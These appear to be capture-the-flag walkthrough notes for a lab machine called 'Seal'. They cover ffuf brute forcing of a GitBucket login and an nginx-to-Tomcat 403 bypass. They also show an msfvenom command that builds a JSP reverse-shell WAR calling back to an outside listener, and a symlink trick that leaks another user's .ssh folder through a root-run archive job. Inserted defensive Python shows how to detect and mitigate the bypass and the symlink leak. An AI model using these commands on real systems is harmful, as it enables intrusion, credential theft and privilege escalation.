Seal
Register a new account at gitbucket
Bruteforce
ffuf -u http://10.10.10.250:8080/register/validate -X POST -d "userName=FUZZ&password=test123&fullName=test&mailAddress=test&extraMailAddresses%5B0%5D=test&extraMailAddresses%5B1%5D=&url=&description=&fileId=" -w ../userlist.txt -mr already -s -H "Content-Type: application/x-www-form-urlencoded;"
Valid usernames: alex, root, luis
ffuf -u http://10.10.10.250:8080/signin -X POST -d "userName=root&password=FUZZ&hash=" -w ../rockyou.txt -fr signin -s -H "Content-Type: application/x-www-form-urlencoded;"
Remove mutual authentication, set up registration and login features
<user username="tomcat" password="[redacted]" roles="manager-gui,admin-gui"/>
Bypass nginx reverse proxy 403 [nginx -> tomcat]:
https://10.10.10.250/manager;a=b/html/
https://10.10.10.250/manager/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=B07EF0732BE104396355D26DD2A56CEE [upload war file]
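The 403 bypass above works because the proxy and the servlet container normalize the same URI differently: nginx matches its location rule on the raw path, while Tomcat strips ";param" path parameters from each segment before routing. A defender can replay that discrepancy over access logs to find requests the proxy let through but the backend would have routed into a protected path. The following is an added example, not part of the original notes; it assumes the proxy rule guards the /manager/html prefix (as the URLs above suggest) and the log lines are constructed in the common nginx combined format.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = """\
10.10.14.76 - - [01/Jan/2024:10:00:00 +0000] "GET /manager/html HTTP/1.1" 403 153 "-" "curl/7.68.0"
10.10.14.76 - - [01/Jan/2024:10:00:01 +0000] "GET /manager;a=b/html/ HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.10.14.76 - - [01/Jan/2024:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.76 - - [01/Jan/2024:10:00:03 +0000] "POST /manager/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=NONCE_PLACEHOLDER HTTP/1.1" 200 900 "-" "curl/7.68.0"
10.10.14.76 - - [01/Jan/2024:10:00:04 +0000] "GET /manager/%68tml/ HTTP/1.1" 403 153 "-" "curl/7.68.0"
"""

# Assumption: the proxy blocks this prefix unless the client passes its extra checks.
PROTECTED_PREFIXES = ("/manager/html",)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def strip_query(uri: str) -> str:
    return uri.split("?", 1)[0]


def proxy_view(uri: str) -> str:
    """Approximate nginx location matching: percent-decoded path, query removed,
    but ';param' path parameters left in place."""
    return unquote(strip_query(uri))


def tomcat_normalize(uri: str) -> str:
    """Approximate the servlet container's routing view of a path: percent-decode,
    drop ';param' from every segment, and resolve '.' and '..' segments."""
    segments: List[str] = []
    for seg in unquote(strip_query(uri)).split("/"):
        seg = seg.split(";", 1)[0]  # ";a=b" and the like are discarded here
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def under_protected(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def find_bypass_attempts(log_text: str) -> List[Dict]:
    """Return entries where the proxy's view is outside every protected prefix
    but the backend's normalized path lands inside one: the two disagreed, so the
    proxy's access rule was not applied to what the backend actually served."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m["uri"]
        normalized = tomcat_normalize(raw)
        if under_protected(normalized) and not under_protected(proxy_view(raw)):
            hits.append({
                "ip": m["ip"],
                "method": m["method"],
                "uri": raw,
                "normalized": normalized,
                "status": int(m["status"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['uri']} -> {hit['normalized']} ({hit['status']})")
```

The same normalization is the fix on the proxy side: an access rule that is evaluated on the path as the backend will interpret it (path parameters stripped, dot segments resolved) cannot be sidestepped by a representation the proxy does not recognise. Requests flagged with a 200 status are the ones that actually reached the protected handler.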
msfvenom --list payloads | grep -ie war
msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.76 LPORT=7901 -o shell.war
TTY shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
Create a soft link: ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/ressurect
ansible run.yml: format: zip, mode: 0777
Because ansible is run by root, a soft link (ln -s) to the .ssh folder placed in the uploads directory is followed when the zip archive is created, so the folder's contents end up in the archive.
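The root-run archive job above has a single defect: it follows symlinks under the directory it packs, so anything a low-privileged user can link into that directory is copied out with root's permissions. The added example below (not the page's or the playbook's own code) shows the check a defender would run before archiving and the archiving behaviour with and without symlink following. It builds a throwaway directory tree in a temp dir that stands in for the uploads folder and the linked .ssh folder; all names and file contents in it are constructed.

```python
import os
import tempfile
import zipfile
from typing import Dict, List


def build_demo_tree() -> str:
    """Construct a throwaway layout (assumption, not the box's real paths): an
    'uploads' directory holding one legitimate file plus a symlink named
    'ressurect' pointing at a directory outside it, as in the notes above."""
    base = tempfile.mkdtemp(prefix="seal-demo-")
    outside = os.path.join(base, "outside_ssh")   # stands in for /home/luis/.ssh
    uploads = os.path.join(base, "uploads")
    os.makedirs(outside)
    os.makedirs(uploads)
    with open(os.path.join(outside, "id_rsa"), "w") as f:
        f.write("CONSTRUCTED PLACEHOLDER, NOT A REAL KEY\n")
    with open(os.path.join(uploads, "note.txt"), "w") as f:
        f.write("harmless upload\n")
    os.symlink(outside, os.path.join(uploads, "ressurect"))
    return uploads


def find_escaping_symlinks(root: str) -> List[str]:
    """Pre-archive check: list every symlink under root whose resolved target
    lies outside root. A non-empty result means the archive would leak data."""
    root_real = os.path.realpath(root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            target = os.path.realpath(full)
            if os.path.commonpath([root_real, target]) != root_real:
                found.append(os.path.relpath(full, root))
    return sorted(found)


def zip_tree(root: str, dest: str, follow_symlinks: bool) -> List[str]:
    """Archive root into dest and return the member names written.
    follow_symlinks=True descends into linked directories and reads through
    linked files (the risky behaviour); False skips every symlink."""
    names = []
    with zipfile.ZipFile(dest, "w", zipfile.ZIP_DEFLATED) as zf:
        for dirpath, dirnames, filenames in os.walk(root, followlinks=follow_symlinks):
            if not follow_symlinks:
                # prune linked directories so they are neither listed nor entered
                dirnames[:] = [d for d in dirnames
                               if not os.path.islink(os.path.join(dirpath, d))]
            for name in filenames:
                full = os.path.join(dirpath, name)
                if not follow_symlinks and os.path.islink(full):
                    continue
                arcname = os.path.relpath(full, root)
                zf.write(full, arcname)
                names.append(arcname)
    return sorted(names)


def demo() -> Dict[str, List[str]]:
    """Run the check and both archiving modes against the constructed tree."""
    uploads = build_demo_tree()
    base = os.path.dirname(uploads)
    return {
        "escaping": find_escaping_symlinks(uploads),
        "naive": zip_tree(uploads, os.path.join(base, "naive.zip"), follow_symlinks=True),
        "safe": zip_tree(uploads, os.path.join(base, "safe.zip"), follow_symlinks=False),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check and the skip are two halves of the same mitigation: refuse to run the job while find_escaping_symlinks reports anything, and archive without following links so a race between the check and the archive cannot reintroduce the leak. Running the job as a dedicated low-privileged account instead of root removes the payoff entirely, since the archiver then cannot read what it is tricked into linking to.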
-----------------------------------------------------------------------
Path:
• bruteforce root login?
• edit nginx config file to bypass 403
• bypass nginx
• upload war file on tomcat manager to gain reverse shell [root flag]
• how is registration happening at gitbucket